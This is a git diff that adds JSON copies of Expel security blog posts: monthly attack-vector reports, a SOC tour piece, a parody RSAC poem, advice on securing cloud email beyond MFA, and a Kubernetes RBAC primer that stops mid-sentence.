they\u2019ve greatly increased their cryptocurrency wallet coverage to include the wide range of options that may be present on an endpoint. If an attacker can collect the private key from a cryptocurrency wallet, they can gain full access to any assets it contains. Resilience recommendations: Implement network layer controls to detect and block network communications to cryptocurrency mining pools. Have computing resource alarms forwarded to your SIEM to alert your team of overtaxed resources deployed for cryptojacking. House cryptocurrency in a hardware wallet disconnected from the internet. Scan and identify public-facing assets using Shodan . Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Phishing keeps the crown TL;DR: Phishing continues to be the constant in the world of cybersecurity. As long as it remains so accessible and successful for attackers, it\u2019ll stay the number one threat. In October, 42 percent of the incidents we investigated were the result of phishing \u2014 down 19 percent from September, but still the most prevalent attack vector by far in a month when we observed a high variety of infection vectors. Microsoft Office 365 (O365) remains the primary phishing target, as all of the business email compromises (BECs) we saw this month involved the Microsoft email service. In addition to the social engineering activity we observed for deploying remote access software, another phishing incident in October highlighted why this strategy remains so successful for attackers. This incident wasn\u2019t particularly unique, but is a great example of the typical tactics used in a successful phishing attempt, detecting credential usage and the importance of multi-factor authentication (MFA). The end user received an email instructing them to click a link to check an urgent voicemail. After clicking the link, the user was redirected to a credential harvesting site configured to appear like a harmless request from Microsoft to re-verify the user\u2019s credentials before granting access to their voicemail. The good news is that when the bad actor tried to use the harvested credentials, Azure AD Identity Protection alerted us about the login attempt, which was unsuccessful thanks to MFA on the account. Resilience recommendations: You know we\u2019re going to say it \u2014 phish-resistant MFA (FIDO/webauthn) for everything and everywhere. Conditional access policies are a great way to help mitigate compromised logins through geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Takeaways Bad actors are using social engineering through phone calls to convince users to install remote access software and configure it as an entry point into their endpoints. This is a prime example of legitimate applications being repurposed for malicious activity, making prevention more difficult. Application allowlisting and security awareness training can be your strongest defense against this particular type of social engineering threat. Cybercriminals also continue to target cryptocurrency as a way to maximize financial gains from their illicit activities. Cryptocurrency\u2019s digital nature, lack of regulation and surging market cap are driving forces behind this trend. Beyond deploying malware for cryptojacking, malware with information stealing functionality are now searching endpoints for a much wider range of cryptocurrency wallets to locate private keys. While many enterprise endpoints may not host cryptocurrency wallets, some companies have made headlines in previous months for adding cryptocurrency exposure to their balance sheets. Companies housing crypto wallets should protect these assets using a hardware wallet disconnected from the internet. And when it comes to cryptojacking, there are two essential things you should do for prevention and detection: first, make sure you don\u2019t have gaps in your EDR deployment coverage. Next, use computing resource alarms to monitor system health and alert your team of overtaxed resources potentially deployed for cryptojacking. Lastly, phishing and BEC remained the biggest threat and most frequent way a bad actor gained access to an environment in October, making up 42 percent of all incidents (with 100 percent of these incidents taking place in O365). Implementing phish-resistant MFA and disabling legacy authentication protocols are key steps to protect O365 accounts. We\u2019ll be back with insights on November\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/top-attack-vectors-september-2021.json b/top-attack-vectors-september-2021.json new file mode 100644 index 0000000000000000000000000000000000000000..a09478f4203f16e7855b83e7eaf0d58382590b18 --- /dev/null +++ b/top-attack-vectors-september-2021.json @@ -0,0 +1,6 @@ +{ + "title": "Top Attack Vectors: September 2021", + "url": "https://expel.com/blog/top-attack-vectors-september-2021/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG Top Attack Vectors: September 2021 Security operations \u00b7 5 MIN READ \u00b7 BRITTON MANAHAN \u00b7 OCT 14, 2021 \u00b7 TAGS: MDR We\u2019re often asked about the biggest threats we see across the incidents we investigate for our customers. Where should security teams focus their efforts and budgets? To answer these questions, we\u2019re sharing monthly reports on the top attack vectors, trends, and resilience recommendations identified by our Security Operations Center (SOC). Our goal is to translate the security events we\u2019re detecting into a security strategy for your org. For this report, our SOC analyzed the incidents we investigated in September 2021 to determine the top attack vectors used by bad actors. Here\u2019s what\u2019s ahead: How bad actors are exploiting public-facing vulnerabilities for crypto mining The PowerShell/DotNet combo bad actors are using for malware The growing Business Email Compromise (BEC) target that can give attackers access to a variety of apps What to do about all of the above Public-facing vulnerabilities and cryptojacking TL;DR: Threat actors are continuing to find and exploit public-facing vulnerabilities, with a focus on deploying cryptocurrency mining software. The exploitation of public-facing vulnerabilities continues to be a top infector vector for threat actors as this category made up 42 percent of the critical incidents we responded to in September. Of these incidents, 80 percent deployed the XMRig cryptocurrency mining software after the initial compromise. This program uses up a vast amount of the compromised system\u2019s resources as it tries to earn cryptocurrency for the threat actors before the software\u2019s detected. This use of compromised computing assets for blockchain mining to earn rewards is known as cryptojacking. Securing potential entry points should be your first focus for preventing cryptojacking and other impactful attacker payloads. In September, we observed the following CVEs for these exploited web applications: CVE-2020-36239 Jira Data Center CVE-2021-26084 Confluence Server Next, system alerts for resource usage can serve a dual purpose for both your operations and security teams. These alerts are normally used by operations teams to automate monitoring system health, but the intense resource demands of cryptocurrency mining software makes it highly likely that cryptojacking will also activate alerts set up to detect when systems are running at their maximum capacity. This monitoring process can be streamlined in the cloud, with built-in solutions like AWS CloudWatch, Azure Monitor and GCP Cloud Monitoring. Resilience recommendations: Consider hiring a penetration tester to gain a better understanding of your external attack surface. Have computing resource alarms forwarded to your SIEM. Deploy an endpoint detection and response (EDR) tool on web servers. Scan and identify public-facing assets using Shodan . Ensure public web applications are patched to their latest version. Deploy a web application firewall (WAF). Attacker payloads often use PowerShell and the DotNet framework TL;DR: Malicious payloads deployed by threat actors take advantage of the PowerShell scripting language and DotNet framework built into the Windows operating system (OS) to obfuscate the true nature of the malware and avoid detection. In September, 83 percent of the malicious payloads we identified during incidents used the PowerShell scripting language and/or the DotNet framework. Both of these components are installed by default in modern versions of the Windows OS and provide different pathways for attackers to obfuscate the functionality of their malware. The SolarMarker Malware variant, which made up 33 percent of our identified malicious payloads, is a prime example of malware that uses these two Windows components. We observed a particular SolarMarker variant that was delivered as a Windows installer file. While its activity on the host was blocked before completion, analysis revealed that the malware first executed a series of PowerShell commands to generate an encoded file on the host. This file was then decoded in-memory into a valid DotNet module containing command and control logic that was then loaded and passed control. With the continued popularity of PowerShell and DotNet for attackers, consider the resilience recommendations below to prevent malware from being deployed on your systems through these vectors. Resilience recommendations: Consider implementing PowerShell Constrained Language Mode. Enable PowerShell Script Block Logging. Confirm your endpoint detection and response (EDR) coverage across all of your endpoints. Phishing Business Email Compromise (BEC) is still the top threat, but threat actors are looking beyond your inbox. TL;DR: BEC remained the top threat in September, but attackers are looking to compromise single sign-on (SSO) identity providers, as well. In September, 61 percent of the critical incidents we responded to were BEC \u2014 on par with previous months. Azure AD Identity Protection remained a strong signal for this type of compromise as the source for detecting 56 percent of the BEC incidents we identified. While we\u2019ve covered the basics of BEC in our previous threat reports , we observed two notable trends in September that are worth calling out. The first was the use of a Python-based user agent when threat actors attempted to interact with a mailbox after a successful phishing attempt, seen in 5 percent of the BEC incidents. This stood out to us because threat actors typically spoof their user agents in an attempt to blend in, rather than using the default user agent supplied by their tool of choice, like the Python requests user agent seen in these incidents. This type of scripting language-based user agent presents a detection opportunity, especially if its prevalence continues to rise. Resilience recommendations: You know it\u2019s coming \u2013 multi-factor authentication (MFA) for everything and everywhere. Conditional access policies are a great way to help mitigate geo infeasibility. Disable legacy protocols like IMAP and POP3 (these don\u2019t enforce MFA). Consider Azure AD Identity Protection to help identify suspicious mailbox logins. Bad actors are also going after cloud identity provider access. The second notable BEC trend we observed in September was attackers not only phishing for email access, but also trying to access a user\u2019s cloud SSO provider. One of the critical incidents we responded to this month had an initial lead of several suspicious logins from the same IP. Further investigation revealed that phishing emails sent to the impacted users contained a link to a credential harvester for the popular SSO identity manager Okta. This wasn\u2019t our first time seeing threat actors attempt to gain access to Okta through phishing. While the threat actors in this particular incident used the harvested Okta credentials to log into Microsoft Office 365 (O365), compromising a user\u2019s SSO credentials opens up a world of possibilities for an attacker to move into any application provisioned to that user. We think attackers were motivated by this opportunity, as all of the incidents we investigated in September involving cloud identity providers targeted Okta. Of note, we\u2019ve also observed threat actors gaining access to Amazon Web Services (AWS) by way of Okta SSO access in previous months. Resilience recommendations: Implement phish resistant MFA (fido/webauthn). Enforce MFA prompts when users connect to sensitive apps through app-level MFA. Customize your Okta sign-in page appearances. If a user lands on a phony Okta sign-in page with no customization, it can help trigger their spidey-sense and let them know that something isn\u2019t right. Takeaways Phishing and BEC remain the hottest threats we\u2019re observing and the most likely way an attacker will gain a foothold into your environment. Threat actors are continuing to target cloud SSO identity providers through phishing emails. While inboxes remain an enticing target, this type of access allows attackers to sign into a variety of applications including cloud providers like AWS, Azure and GCP. Enforcing MFA and disabling legacy protocols should be your first steps to protect against BEC. But when it comes to SSO identity providers, consider customizing your login page to help users visually detect when they\u2019ve opened a fake page like a credential harvester. Then apply additional MFA around any highly sensitive applications and access roles as a second line of defense. In the realm of malware, 80 percent of the public-facing vulnerability exploits we observed in September were used to deploy the XMRig cryptocurrency mining software. This isn\u2019t a coincidence given the recurring cryptocurrency activity we\u2019ve seen this year. Start by following proper endpoint guidance, including EDR and patching, and understand your external attack surface to help prevent these exploits. Next, applications used to alert operations teams of overtaxed resources can also help security teams by indicating resources deployed for cryptojacking. Threat actors are also continuing to deploy malicious payloads that use the PowerShell scripting language and/or the DotNet framework. PowerShell Script Block Logging and constrained language mode can help detect and prevent threat actors using PowerShell. We\u2019ll be back with insights on October\u2019s top attack vectors. In the meantime, have questions about this month\u2019s data or what it means for your org? Drop us a note ." +} \ No newline at end of file diff --git a/touring-the-modern-soc-where-are-the-dials-and-blinking.json b/touring-the-modern-soc-where-are-the-dials-and-blinking.json new file mode 100644 index 0000000000000000000000000000000000000000..b8c3e1d3cd584d8daadf56280cf645aeae567eda --- /dev/null +++ b/touring-the-modern-soc-where-are-the-dials-and-blinking.json @@ -0,0 +1,6 @@ +{ + "title": "Touring the modern SOC: where are the dials and blinking ...", + "url": "https://expel.com/blog/touring-the-modern-soc-where-are-the-dials-and-blinking-lights/", + "date": "Dec 5, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Touring the modern SOC: where are the dials and blinking lights? Expel insider \u00b7 3 MIN READ \u00b7 JONATHAN HENCINSKI \u00b7 DEC 5, 2022 \u00b7 TAGS: Tech tools When you think about taking a tour of a security operations center (SOC), what vision comes to mind? Some may see rows of desks with analysts\u2019 eyes glued to computer screens, racks of servers, and other computing equipment. Perhaps there\u2019s a central hub, with lots of dials and blinking lights indicating security levels of the organization\u2019s various tools and services. They picture themselves walking around, taking in the unfamiliar sights, and leaning in to get a closer look. Maybe they ask a few questions and eventually decide, \u201cYes, this is impressive. I feel secure.\u201d The reality of the modern Expel SOC tour is very different from this, mainly because SOC analysts are more likely to be remote and widely distributed geographically. While this means there\u2019s less chance of an impressive room where analysts are physically next to one another, it doesn\u2019t mean they\u2019re any less effective. It simply means that our SOC tour takes a different form. At Expel, the tour starts with a discussion about mission . A key ingredient to high-performing teams is a clear purpose, and ours is to protect our customers and help them improve. This centers around problem solving and serving as a strategic partner. We\u2019re not just helping customers deal with incidents, we\u2019re making recommendations on how to better prepare for future threats, how to improve processes and workflows, and where to make time and resource investments to boost overall security operations. Notice there are no mentions of trying to impress anybody with blinking lights. That\u2019s intentional. Next, we talk about culture and guiding principles \u2014 key ingredients for any SOC. We think about culture as the behaviors and beliefs that exist when management isn\u2019t in the room. Culture isn\u2019t platitudes or memes on a PPT slide; culture is about behavior and intent. The key ingredients of our SOC culture are: We lead with technology Before we solve a problem, we own the problem We\u2019re a learning organization \u201cI don\u2019t know\u201d is always an acceptable answer Once we set a clear mission and mindset, we look at how our team is organized to meet the customer\u2019s goals. Our 24\u00d77 SOC is made up of defenders with varying levels of experience, and less experienced analysts are backed by seasoned responders. If we have a runaway alert (it happens), our team of detection and response (D&R) engineers are ready to respond. And of course, our friendly bots, Josie\u2122 and Ruxie\u2122, are there to support us. Josie detects and classifies alerts and enables us to make decisions about customers\u2019 security signals, while Ruxie gathers critical information about threats so analysts don\u2019t have to. The SOC tour then shifts to operations management and how we at Expel do this for a living. We must have intimate knowledge of what our customers\u2019 systems look like to know when an issue needs attention. With solid operations management in place, we can constantly learn from our analysts and operations for the decision moment. We watch patterns and make changes and adjustments to reduce manual effort. This allows us to hand off repetitive tasks to our bots so automation can unlock fast and accurate insights to inform decision-making. This ongoing optimization is one of the things that sets Expel apart. Next, our SOC tour focuses on how we think about investigations (which are really just narratives). When we identify an incident, we investigate to determine what happened, when it occurred, how it got there, and what we need to do about it. Investigations have all the elements of a great story, and we get to write the ending. Next, we talk about quality control in the SOC . We emphasize a few key points: We don\u2019t trade quality for efficiency We can measure quality in a SOC Quality control checks run daily based on a set of manufacturing ISOs to spot failures, so we can drive improvements What about results? We typically go from alert-to-fix in under 30 minutes, and we\u2019re proud of that number. The result is driven by a high degree of automation and retention of SOC analysts. Some interesting statistics we recently gathered from our SOC team: Alert-to-fix time for critical incidents was 28 minutes 77% of alerts sent to the SOC were backed by automation Auto-remediation actions were completed in seven minutes The average tenure of SOC analysts is ~20 months Before the tour ends, we share insights . The security incidents we detect become insights for every customer. And we don\u2019t stop there; we curate these findings every three months for our Quarterly Threat Report, which surfaces the most significant data we\u2019re seeing in our threat detection and response efforts. It buckets the data into trends that can affect your cybersecurity posture, and it offers resilience recommendations to protect your organization. (Have a free look at our Q3 Quarterly Threat Report here.) We then spend some time looking at the Expel Workbench\u2122 , the platform where our SOC analysts work side-by-side with customers on investigations and remediation. This is where all that automation, SOC experience, operations management work, incident insight, and more comes together to detect, understand, and fix issues fast. Take a peak at the Expel Workbench here . Finally, we stop by the actual, virtual SOC. Most of our analysts are remote, but as we noted earlier, a SOC tour is about so much more than seeing a room with monitors. We believe a great SOC tour highlights the people, culture, and mindset behind the technology and processes that help keep our customers\u2019 environments secure. We introduce you to the folks behind the curtain so you can see for yourself we\u2019re a dedicated team \u2014 not just a bunch of blinking lights." +} \ No newline at end of file diff --git a/twas-the-night-before-rsac-expel.json b/twas-the-night-before-rsac-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..3383e85de3fbb387fe69dcb016d1a8000b0b898f --- /dev/null +++ b/twas-the-night-before-rsac-expel.json @@ -0,0 +1,6 @@ +{ + "title": "'Twas the Night Before RSAC - Expel", + "url": "https://expel.com/blog/twas-night-rsac/", + "date": null, + "contents": "Subscribe \u00d7 EXPEL BLOG \u2018Twas the Night Before RSAC Expel insider \u00b7 3 MIN READ \u00b7 MICHAEL J GRAVEN \u00b7 APR 15, 2018 \u2018Twas the night before #RSAC , when all thro\u2019 San Fran, No attacker was stirring, not even Shodan. The booths were all built, the swag was all there, In hopes that the hordes would actually care. The bankers were nestled all smug in their beds, While visions of IPOs danced in their heads. And Mon with her keynote and I with my lanyard, I\u2019d charged up my phone, and was here to get hammered; When out south of Market arose such a clatter, I whipped out my phone to see what\u2019s the matter. The threatcon was still a calm level two, Not Bears , or Kittens or Pandas . Then who? Dozens of vendor pleas, all trite and lame, They promised the moon, but used my wrong name. \u201cPlease come to our booth! Get a shirt! Buy our things!! Both Gartner and Forrester think we\u2019re the kings. Again. Delete. I banished their scrawl, Dashing away from the exhib-it hall. Then t\u2019ward a party I flew like a moose, Tore past registration and downed a Grey Goose. When what did I spy in a sea of white men, But tech that\u2019s \u201c advanced ,\u201d has \u201c ML ,\u201d is \u201c next-gen !\u201d A sole data scientist, so wiry and sparse, I knew in a moment it must be a farce. And then there were some, like bears eyeing honey, Who saw all the CISOs and wanted their money; So up to the guests by the bar they all flew, With bags full of products and pitches, none true; I\u2019d finished my drink and was turning around, When I froze, \u2018cuz I had been run to ground; Badge scanner in hand, logo bag on his back, He looked like a wombat about to attack. His widget was \u201cscalable,\u201d \u201cunique\u201d and \u201crobust,\u201d Just buy it and go, there\u2019s no need to adjust. His droll little mouth was drawn up like a bow, And clearly he thought that he\u2019d earn lots of dough. He pulled out his phone and went straight to work, \u201cSo when can we meet?\u201d it drove me berserk. But before I could blink or hide my badge code, He looked past my ear, and beyond me he strode; He spied someone else with more budget than me, And I realized that elsewhere is where I could be. I love what I do but I hate being prey, I had to stop pissing my budget away. I needed a break from the endless alerts, To fix what is wrong so it wouldn\u2019t get worse; Could I focus my time and my team on the things, That would bring some real value? Make customers sing? I don\u2019t want to live in a world that\u2019s so dark, Where truth and reality both jumped the shark. It\u2019s working on what is important to you, That keeps you from bidding security adieu. I decided to seek out the folks I could trust, To cover my backside while I readjust. The tools that you buy and the hashes you know Don\u2019t determine your happiness: win, place or show. So check out the talks in the con-fer-ence halls, And even some parties and cryptonerd balls; Then find, if you can, your security tribe, The people with whom you share the same vibe; It\u2019s there you will find your burden made light, Propelling you, arming you, into the fight. So with that I say, be you vendor or geek, Happy RSAC to all and to all a good week. Expel doesn\u2019t have a booth. We banned finger guns. We\u2019re at the conference, and if you\u2019d like to meet with us and talk about the way things could be \u2013 which our doggerel verse here hints at, naturally \u2013 head to http://info.expel.io/rsa2018 and grab a spot on our calendar. If you want to talk about Expel, great \u2026 if you want to abuse us about our terrible poetry, that\u2019s cool, too\u2026 and if you just want some Tylenol, Gatorade and a bagel sandwich, hallelujah and we\u2019ll see you there. We\u2019ve been coming to this thing since it was still alternating between San Jose and San Francisco. And while the conference has changed a lot in the last fifteen years (in many ways lamentable), it\u2019s still one of the best opportunities to get together with old friends, have a little fun and talk about how things could be. Expel makes space for you to do what you love. And one of the things we love is catching up with old friends and talking some shop. Hit us up. Michael Graven, +1 (612) 568-5772, michael.graven@expel.io Justin Bajko, +1 (703) 839-5240 , justin.bajko@expel.io Matt Peters, +1 (571) 215-0214, matt.peters@expel.io Peter Silberman, +1 (301) 943-0893, peter.silberman@expel.io" +} \ No newline at end of file diff --git a/two-factor-authentication-doesn-t-fully-secure-cloud-email.json b/two-factor-authentication-doesn-t-fully-secure-cloud-email.json new file mode 100644 index 0000000000000000000000000000000000000000..33e939c8851feebff695a8597f0ef76f36cb419e --- /dev/null +++ b/two-factor-authentication-doesn-t-fully-secure-cloud-email.json @@ -0,0 +1,6 @@ +{ + "title": "Two-Factor Authentication Doesn't Fully Secure Cloud Email", + "url": "https://expel.com/blog/mfa-not-silver-bullet-to-secure-cloud-email/", + "date": "Oct 2, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG MFA is not a silver bullet to secure your cloud email Security operations \u00b7 5 MIN READ \u00b7 ANDREW PRITCHETT AND ANTHONY RANDAZZO \u00b7 OCT 2, 2019 \u00b7 TAGS: Get technical / How to / SOC / Vulnerability Remember the good ol\u2019 days when you used to run your own email servers? Well, maybe they weren\u2019t good days (I\u2019m looking at you, Exchange) \u2026 More and more orgs are transitioning from using traditional on-premise email solutions to cloud-based solutions like Microsoft\u2019s Office 365 and Google\u2019s G Suite. (Fun fact: Microsoft Office 365 had 155 million business users as of last year.) And it\u2019s easy to see why: you no longer have to support all of the required infrastructure or employ a team of individuals to service complicated Exchange deployments. The data is now hosted by a third party who is responsible for encrypting the data at rest, system availability, global delivery and developing and maintaining state of the art security protocols and services. While cloud-based email comes with some security benefits like hosted unified audit logging and modern authentication protocols \u2014 they\u2019re still pretty new and heavily targeted by attackers. Cloud-based email systems are an easy way for the bad guys (or gals) to gain initial access into new environments or conduct other criminal activities. You\u2019ve probably heard that if you just enable a multi-factor authentication (MFA) solution, then everything will be sunshine and rainbows. And while MFA is a good step toward securing cloud-based email systems, it\u2019s not a silver bullet. The reality is that MFA can be defeated by an attacker given the right resources and persistence. MFA should only be considered as one of the several security measures an organization should employ rather than the end-all-be-all. Regardless of whether you have MFA enabled or not, it is important to layer your security controls to strengthen your overall security posture. Even if your organization doesn\u2019t have the means to enable MFA, we highly recommend reading further to understand some additional risks to your cloud email environment and ways to reduce that risk. Disable legacy email protocols There are a bunch of email protocols and services in use today: Exchange Web Services (EWS), Messaging Application Programming Interface (MAPI), Exchange ActiveSync (EAS) \u2026 the list goes on . While most of these common email services and applications support MFA, some of the legacy email protocols don\u2019t. For example, the IMAP and POP email protocols are the two you should disable immediately. These protocols don\u2019t support MFA by default and will fully circumvent MFA with single-factor authentication. That means if an attacker phished the credentials of one of your users, then he or she can easily access that user\u2019s entire inbox if authenticating via an IMAP or POP client (and trust us, this will probably be the first thing they try). Another big concern with IMAP and POP are that they expose too much data to the client application. Different clients have different sync settings by default and this determines how much of the mailbox is actually downloaded after a session is created. Attackers can obtain an entire copy of a user\u2019s mailbox in order to search and parse offline for sensitive data. Another shortcoming with these protocols is that there\u2019s usually no logging available to determine exposure once you find an account compromise via IMAP or POP. In many circumstances, your security leaders would consider the entire mailbox exposed. G Suite usually has these protocols disabled by default. However, if somewhere along the road your admins enabled it for any of your users, it\u2019s fairly simple to disable . O365 is another story, though. IMAP and POP are enabled by default and must be manually disabled across the tenant. If your user base is using IMAP or POP clients, particularly mobile clients, this could impact their ability to access email and may require them to authenticate with a new email client that supports MFA. As a helpful reminder, if you have multiple tenants, you will need to apply these actions to all of your tenants. If you determine that it\u2019s catastrophic to end-user experience to get rid of these protocols on your tenant, then consider using global and conditional access policies to prevent employees from using these protocols under certain circumstances. (More on conditional access in a bit.) Disable basic authentication for all email protocols Is your org\u2019s IAM team getting woken up in the wee hours of the night thanks to a ton of Azure Active Directory, G Suite or cloud IAM (Okta/Duo) account lockouts from unauthorized access attempts? Here\u2019s the primary culprit. (You\u2019re welcome \u2014 and cheers to now getting a full night\u2019s sleep.) O365 currently has two implementations of authentication: basic authentication and modern authentication (Microsoft\u2019s OAuth2). Because basic authentication is enabled by default, this allows older email clients that do not support modern authentication to bypass MFA as well. The protocols that allow for basic authentication in O365 are ActiveSync, Autodiscover, EWS, IMAP4, POP3, and authenticated SMTP. Now, even if you\u2019ve disabled the IMAP and POP protocol as described in the previous section, the attacker can still attempt to authenticate (via credential stuffing, password spraying, or brute force), which in turn will create an abundance of account lockouts! Microsoft has released some good news though. In October 2020, they will no longer support basic authentication in O365, but in the meantime, you can disable basic authentication yourself. Remember that this could have a major impact your end-user experience, and may require using a different email client. On October 1, 2019, Microsoft released conditional access policies in audit-only mode , which can help measure this impact to users. If you\u2019re interested in the current use of IMAP/POP and other basic authentication sessions in O365, we\u2019ve found that the user-agent string CBAInPROD is a pretty good indication of this activity. Check your Azure AD logs for signs of this if you\u2019re uncertain of your current Exchange configurations. It can be found in the ExtendedProperties of UserLoggedIn operations logs. G Suite also provides support for less secure apps (email clients). This too is disabled by default, but if you find it is enabled for users in your G Suite account, you can disallow sign-in from these apps. Enable conditional access policies Conditional Access enables administrators to apply policies (or multiple policies) to control who and what has access to apps in your environment. Conditional Access policies are enforced after the first-factor authentication has been completed but before the user is granted access to the environment. Therefore Conditional Access can evaluate multiple \u201csignals\u201d against your policies to determine success against certain pass/fail conditions. These \u201csignals\u201d include: \u2713 user and/or group membership \u2713 IP location information or ranges \u2713 users device type, state or use patterns \u2713 attempted access to applications \u2713 real-time and calculated risk detection as well as other features unique to each service provider If your org only services customers in one region of the U.S. and all of your employees reside and operate within the U.S., do you need to allow authentications from China, Russia and the Netherlands? Conditional access policies in O365 are another security measure which is relatively easy to enable and go a long way in supporting the effectiveness of MFA. Policies can be configured within an administrative session on the \u201cAzure Conditional Access\u201d tab. For G Suite, conditional access policies are most often configured via a third-party SSO agent or MFA client such as Okta and DUO respectively. Much like enabling MFA, whenever you make policy changes to authentication protocols, consider any adverse reactions to critical production systems and processes. We recommend making any of these changes in a phased roll out so that you can closely monitor changes for several days before implementing the next set of changes. Any one of these security measures will strengthen your security posture \u2014 but combined they complement each other to make your organization far more resilient against business email compromise (BEC) and unauthorized access." +} \ No newline at end of file diff --git a/understanding-role-based-access-control-in-kubernetes.json b/understanding-role-based-access-control-in-kubernetes.json new file mode 100644 index 0000000000000000000000000000000000000000..8ae7d06f68fd31cf64d58740f7856bbebdeb2e14 --- /dev/null +++ b/understanding-role-based-access-control-in-kubernetes.json @@ -0,0 +1,6 @@ +{ + "title": "Understanding role-based access control in Kubernetes", + "url": "https://expel.com/blog/understanding-role-based-access-control-in-kubernetes/", + "date": "Oct 26, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Understanding role-based access control in Kubernetes Security operations \u00b7 5 MIN READ \u00b7 DAN WHALEN \u00b7 OCT 26, 2022 \u00b7 TAGS: Cloud security This article originally appeared on ContainerJournal.com and can be found here . It\u2019s reprinted here with permission. \u201cI\u2019m sorry Dave, I\u2019m afraid I can\u2019t do that.\u201d \u2013 HAL 9000, 2001: A Space Odyssey This iconic quote from 2001: A Space Odyssey is a great place to start if you want to understand authorization in Kubernetes. In the movie, of course, HAL is a rogue artificial intelligence; imagine for a moment that he was instead a simpler, rules-based system responsible for allowing or denying requests. An astronaut might ask HAL to perform a task, like \u201cturn off the lights\u201d or \u201cpressurize the airlock.\u201d HAL, operating in (hopefully) the best interests of the astronauts and their spacecraft, must decide whether the request is reasonable and if the action should be taken. HAL needs to evaluate each request against a set of internal rules that define who is authorized to execute what actions that impact which resources. This is \u201cauthorization\u201d in a nutshell: a system of rules designed to determine whether or not something is allowed. Understanding authorization is critical to understanding how role-based access control (RBAC) works for securing Kubernetes. Whether you\u2019re a security professional starting to learn about Kubernetes or an engineer building with it, it\u2019s important to understand the basic systems and rules that govern Kubernetes. RBAC in Kubernetes While Kubernetes technically supports other authorization modes, RBAC tends to be the de facto mode for access control these days. Understanding how it works will help users provision the permissions their teams need and avoid handing them out unnecessarily to those that don\u2019t need them. These concepts are especially useful as security pros think about managing risk in Kubernetes by enforcing least-privilege best practices. Before getting into specifics, there are a few core design principles worth calling out: Access is denied by default and permissions can only be added. A user cannot grant permission for something they do not have the permission to do themselves. This is a built-in mechanism to prevent privilege escalation. Because Kubernetes relies on a trust relationship with an external identity provider\u2014such as an identity and access management (IAM) system\u2014there is no such thing as a \u201cKubernetes user.\u201d The external identity provider is responsible for managing users, while Kubernetes simply ensures users can prove they are who they claim to be and checks whether they are authorized to perform the desired action. Resource Types for RBAC Configuration As with everything Kubernetes, configuring RBAC policy is just a matter of creating the right resources. In this case, there are four resource types that control authorization: Roles, ClusterRoles, RoleBindings and ClusterRoleBindings. While some of these may sound similar, there are important differences. Roles and RoleBindings grant access within the scope of a single namespace while ClusterRoles and ClusterRoleBindings are generally used to provide access across the entire cluster (though there are exceptions). Defining roles and role bindings is as simple as whipping up manifests in YAML. The schema for these resources is well documented in the official Kubernetes docs, but it\u2019s important to understand how it works in practice. Below are a few examples to help illustrate the process: Example One: Granting Access to Read Pods for one Namespace Let\u2019s start with a simple example\u2014an administrator needs to grant \u201cDave\u201d access to get and list pods in a single namespace. They would start by creating a Role and RoleBinding that look something like this: They\u2019ve created two resources: a Role called pod-viewer and a RoleBinding called pod-viewers. The role defines what actions (aka \u201cverbs\u201d) can be taken against what kinds of \u201cresources.\u201d The RoleBinding is what maps principals (in this case, only Dave) to that role. In this example, Dave can only get and list pods in the \u201cfoo\u201d namespace. He will not be able to interact with any resources in the \u201cbar\u201d namespace. Example Two: Granting Cluster-Wide Access Now imagine the administrator wants Dave to be able to examine all pods in a cluster across all namespaces. One way to accomplish this is with a ClusterRole and ClusterRoleBinding, like so: At first glance, this may look similar to the previous example, but now Dave\u2019s access isn\u2019t limited to the \u201cfoo\u201d namespace. Because this results in broader, less restricted access, security analysts and engineers will correctly note that granting access across the entire cluster is risky. Generally speaking, it\u2019s important to avoid over-provisioning permissions. Given the frequency with which today\u2019s attackers are engaging in identity theft, over-provisioning can cause serious damage if an identity is compromised. Example 3: Binding ClusterRoles to Specific Namespaces Some organizations have a lot of users and a lot of namespaces. To keep operations moving smoothly, they may want to grant a common set of permissions to users for their individual namespaces. Fortunately, that doesn\u2019t mean they need to create a Role resource for each namespace. In fact, they can bind a ClusterRole to a single namespace with a RoleBinding: In this example, they have used a namespaced RoleBinding to bind Dave to the pod-viewer role only in the \u201cfoo\u201d namespace \u2014 which means he won\u2019t be able to access pods in other namespaces. This is functionally equivalent to the first example, the \u201cpod-viewer\u201d role can be reused across multiple namespaces. There is now one centralized place to manage a common set of permissions that can be used across a wide range of namespaces without granting users access to all of them. Not Everything in Kubernetes is Intuitive These basic tips can get users most of the way to understanding permissions in Kubernetes, but there are still a few specific intricacies that security professionals and engineers should understand. Aggregated ClusterRoles are one such example: Cluster role aggregation lets administrators add permissions to an existing ClusterRole without modifying the role itself. This is primarily used in situations where they need to add permissions to a default ClusterRole (like \u201cview\u201d or \u201cedit\u201d). While modifying the default role technically works, it can become problematic when upgrading clusters. Kubernetes can disrupt default role modifications, sometimes breaking required permissions. Fortunately, this can be avoided by aggregating additional permissions into an existing ClusterRole with a separate ClusterRole definition and a special annotation. While this sounds confusing, it\u2019s surprisingly easy to visualize: In the example above, the pod-mgr role only provides permissions to get pods. However, it\u2019s also aggregating any permissions from other ClusterRoles with the \u201cagg-pod-mgr\u201d label, so the effective permissions are get and list. Speaking of verbs, there are three \u201cuncommon verbs\u201d that nonetheless have an important effect on how authorization decisions are made in Kubernetes. At the risk of being overly dramatic, these verbs literally change the rules and are exceptions to some of the fundamental rules mentioned before. They are: \u201c Bind .\u201d Bind is the exception to the earlier rule about a user not being able to grant permission they don\u2019t already have. The bind verb allows the user to create a role-binding resource even if they don\u2019t have the permissions for the targeted role. Security analysts should watch out for this verb, as it\u2019s a common way to escalate privileges. \u201c Escalate .\u201d By default, users cannot edit a role they\u2019re already bound to in order to grant themselves additional privileges\u2014a reasonable precaution. The escalate verb gives them permission to do just that, bypassing the \u201cDoes this user already have these permissions?\u201d check that normally occurs when editing a role. \u201c Impersonate .\u201d Impersonation is a mechanism that allows a user to run an API request acting as a different principal (user, group, service account). It\u2019s like the equivalent of the \u201csu\u201d command in Linux, but for Kubernetes. Typically, this verb is only used by highly privileged administrators to help debug permissions issues, so security professionals should scrutinize use of the impersonate verb to make sure there isn\u2019t an unexpected path to escalate privileges. Finally, it\u2019s important to be aware of the 